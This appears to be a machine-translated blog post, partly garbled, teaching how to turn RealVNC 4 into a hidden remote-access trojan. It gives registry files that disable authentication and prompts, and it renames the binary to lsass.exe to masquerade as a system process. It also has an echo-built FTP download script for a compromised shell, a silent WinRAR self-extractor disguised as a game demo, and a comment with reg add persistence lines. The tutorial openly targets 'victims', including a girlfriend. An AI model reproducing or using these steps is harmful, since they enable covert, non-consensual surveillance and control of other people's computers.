Materials:
FTP Server (any)
winvnc4
ResHacker
Trojanized Here to learn the realvnc4 in different ways, but first be hide the boring black and white icon shown next to time and betrays us when the RealVNC is active ... what will we do with the resources ResHacker deleting icons and images and all those we can reveal:
Do not want to complicate your life you can download it from http:// 512.iespana.es/vnc already compiled and everything, and finally rename it to "lsass.exe" taking advantage of a vulnerability in Task Manager that says lsass.exe can not stop XD.
Now assuming we are in a shell ... we will upload them via ftp.
open our FTP server and configure the user name and password:
should see an icon well: 
Now let's configure our Trojan in two ways ... One is to view only the victim's desktop with no account and another to take total control without being able to do anything that bad lol: p. For this we need to make a registry entry as follows: Windows Registry Editor
Version 5.00 [HKEY_LOCAL_MACHINE \\ SOFTWARE \\ RealVNC \\ winvnc4]
"SecurityTypes" = "None"
"ReverseSecurityTypes" = "None"
"DisconnectAction "=" None "
" QueryConnect "= dword: 00000000
" QueryOnlyIfLoggedOn "= dword: 00000000
" LocalHost "= dword: 00000000
" Hosts "= dword: 00000000
" AcceptKeyEvents "= dword: 00000000
"AcceptPointerEvents" = dword: 00000000
"AcceptCutText" = dword: 00000000
"SendCutText" = dword: 00000000
"DisableLocalInputs" = dword: 00000000
"DisconnectClients" = dword: 00000000
"AlwaysShared" = dword: 00000000
" NeverShared "= dword: 00000000
" RemoveWallpaper "= dword: 00000000
" DisableEffects "= dword: 00000000
" UpdateMethod "= dword: 00000001
" PollConsoleWindows "= dword: 00000001
" UseCaptureBlt "= dword: 00000001
" UseHooks " = dword: 00000001
"Protocol3.3" = dword: 00000000
Copy this and paste it into Notepad and save it as "vm.tmp" which means "View Mode "... if you want to manage the desktop of another victim then paste this text: Windows Registry Editor
Version 5.00 [HKEY_LOCAL_MACHINE \\ SOFTWARE \\ RealVNC \\ winvnc4]
" SecurityTypes "=" None "
" ReverseSecurityTypes "=" None "
" DisconnectAction "=" None "
" QueryConnect "= dword: 00000000
" QueryOnlyIfLoggedOn "= dword: 00000000
" LocalHost "= dword: 00000000
" Hosts "=" 0 "
" AcceptKeyEvents "= dword: 00000001
"AcceptPointerEvents" = dword: 00000001
"AcceptCutText" = dword: 00000001
"SendCutText" = dword: 00000001
"DisableLocalInputs" = dword: 00000001
"DisconnectClients" = dword: 00000000
"AlwaysShared" = dword: 00000000
"NeverShared" = dword: 00000000
"RemoveWallpaper" = dword: 00000001
"DisableEffects" = dword: 00000000
"UpdateMethod" = dword: 00000001
"PollConsoleWindows" = dword: 00000001
" UseCaptureBlt "= dword: 00000001
" UseHooks "= dword: 00000001
" Protocol3.3 "= dword: 00000000
" PortNumber "= dword: 0000170c
" IdleTimeout "= dword: 00000e10
" HTTPPortNumber "= dword: 000016a8
" RemovePattern "= dword: 00000000
and save it as" ct.tmp "which means" Total Control. " Now climb
configurations and using vnc from our shell ftp.exe command as follows:
The idea is that through the echo command to do a text ftp.exe execute commands as follows:
Echo or>> ftp.txt
Echo 192.168.1.69>> 192.168.1.69 ftp.txt Here is our FTP server IP as Echo
user>> ftp.txt This is the Echo
FTP user pass>> ftp.txt This is the password of FTP
Echo get lsass.exe>> ftp.txt This is our VNC4
get wm_hooks.dll Echo> Echo
ftp.txt get logmessages.dll>> Echo
ftp.txt get vm.tmp>> ftp.txt If we only look "vm" if control use, "ct" Echo
quit>> ftp.txt
Now run the command to raise us all: ftp-s: ftp.txt and now that we have everything we care about the record as follows: reg import reg import ct.tmp vm.tmp or if you want to control or just look.
Now that we have our Trojan ready and set, we proceed to execute it as follows:
Lsass.exe-register-start
Lsass.exe
Now that our Trojan is running as a service, we ready to go with our client:
Where it says 127.0.0.1 is the IP the victim that has the Trojan.
If you look ... I do not see any icon that would betray its existence and pinches Although the primary or secondary button mouse (right click and Isquierdo) nothing appears:
Now we'll do it another way ... you'll like bait without being in a shell using Winrar.
Materials: Winrar
RealVNC4
Now select the next and compress it:
and proceed to build our Trojan:
1: We will create a file "sfx" ...
2: Let the Advanced tab and click in "Options SFX
3: extraction folder put "% HOMEDRIVE%% HOMEPATH% \\ update" and "Run after extraction" put "setup" (then explain why)
4: In the tab "Mode" select "Hide all" and "Skip existing files" to avoid future mistakes and that also does not show anything, because we want to be as quiet as possible not?.
5: "Text and icon" where it says below: "Load SFX icon from file" icon to look for a choice ... in my case I put on a game called "Max Card" and press OK once.
6: 'comment text appears on one side it says: Setup = setup and replace it with the following:
Setup = "% windir% \\ system32 \\ cmd.exe" / c reg import "% HOMEDRIVE%% HOMEPATH% \\ update \\ vm.tmp "
Setup = lasaa.exe-noconsole-register
Setup = lasaa.exe-noconsole-start
See if is a single line for each setup. Now I will say this is? ... ps explain:
Setup = "% windir% \\ system32 \\ cmd.exe" / c reg import% HOMEDRIVE%% HOMEPATH% \\ update \\ vm.tmp "/ / import the configuration of our Trojan
Setup = lasaa.exe-noconsole-register / / register the Trojan to run Setup mode = lasaa.exe
SYSTEM-noconsole-start / / Start the Trojan
Now we accept everyone and should appear something like:
In my case I put the icon Max Card to tell my dear good friend called "Victim" which is the demo of MAX COMB III (obviously no) and open it happen the same as the first example:
Without any icon and connect to our customer:
Obviously 127.0.0.1 should be the IP of the victim.
Now can you tell if your girlfriend's cheating or give you the fright of his life to you always control your pc has screwed XD.
Note: You can add extra registry entries to run every time you start the pc or do whatever you want.
and video applications is
http://512.iespana.es/vnc Att. Yan
Unilola Software.
blog posts
- 1) You can create a bat with the following characteristics:
1 - the first kita the happy little icon.
2 - the second disables authentication.
3 - the third one to start the system.
reg add hklm \\ SOFTWARE \\ ORL \\ WinVNC3 / V DisableTrayIcon / t REG_DWORD / d 1 / f reg add hklm
\\ SOFTWARE \\ ORL \\ WinVNC3 / v authrequired / t REG_DWORD / d 0 / f reg add
hklm \\ software \\ microsoft \\ windows \\ currentversion \\ run / v dllhost.exe / t REG_SZ / d winvnc.exe / f
0 comments:
Post a Comment